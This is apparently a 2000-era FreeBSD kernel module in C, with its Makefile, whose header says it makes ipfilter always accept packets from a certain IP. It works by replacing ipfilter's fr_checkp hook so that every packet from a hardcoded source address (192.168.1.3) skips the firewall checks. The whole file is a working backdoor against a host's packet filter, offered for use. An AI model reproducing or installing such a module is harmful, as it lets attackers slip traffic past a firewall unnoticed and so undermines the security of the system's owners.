LKM for FreeBSD which makes ipfilter always accept packets from a certain IP.
d411790929f20a121f5c4adfb5b253210f3b91a01fbfc42a70416a71e1ff5ec4
/*
* Name: Filtering IPFiLTER
* Date: Thu May 18 11:00:59 2000
* Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
*
* SoftProject 2000 - Digital Sekurity for Y2k
* Sikurezza.org - Italian Security MailingList
*
* COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
* Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
*
* Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #7: Sun May i386
*
* IPFilter (like ipfw) uses a function pointer in ip_input() and ip_output()
* in order to process packets ...
*
* if(fr_checkp) {
* struct mbuf *m1 = m;
*
* if((*fr_checkp)(ip, hlen, m->m_pkthdr.rcvif, 0, &m1) || !m1)
* return;
* ip = mtod(m=m1, struct ip *);
* }
*
* I give you a Makefile in append so don't write me for that !!! :)
*/
#define GO_JOHNNY_GO "192.168.1.3"
/* Packets sent by this ip wouldn't process */
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>
/* IPFILTER FreeBSD Options */
typedef struct ip ip_t;
typedef struct mbuf mb_t;
/* A simple typedef for filter check prototypes */
typedef int ipfr_t __P((ip_t *, int, void *, int, mb_t **));
/* Prototypes */
static int s_load __P((struct module *, int, void *));
static u_int32_t inaton __P((const char *));
extern ipfr_t *fr_checkp;
static ipfr_t myfr, *fr;
/* module handler */
static int
s_load (struct module *module, int cmd, void *arg)
{
int s;
switch(cmd) {
case MOD_LOAD:
s = splnet();
fr = fr_checkp;
fr_checkp = myfr;
splx(s);
break;
case MOD_UNLOAD:
s = splnet();
fr_checkp = fr;
splx(s);
break;
}
return 0;
}
/* module struct */
static moduledata_t s_mod_1 = {
"ipfil_mod",
s_load,
0
};
DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);
static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
if(ip->ip_src.s_addr == inaton(GO_JOHNNY_GO))
return 0;
return(fr(ip, hlen, ifp, out, mp));
}
static u_int32_t
inaton(const char *str)
{
unsigned long l;
unsigned int val;
int i;
l = 0;
for(i=0; i < 4; i++) {
l <<= 8;
if(*str != '\0') {
val = 0;
while(*str != '\0' && *str != '.') {
val *= 10;
val += *str - '0';
str++;
}
l |= val;
if(*str != '\0')
str++;
}
}
return(htonl(l));
}
/*
# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org >
.PATH: /sys/kern
SRCS = ipfhack.c
CFLAGS+= -I/sys
KMOD = ipfhack
NOMAN = t
KLDMOD = t
KLDLOAD = /sbin/kldload
KLDUNLOAD = /sbin/kldunload
CLEANFILES+= ${KMOD}
load:
${KLDLOAD} -v ./${KMOD}
unload:
${KLDUNLOAD} -v -n ${KMOD}
.include <bsd.kmod.mk>
*/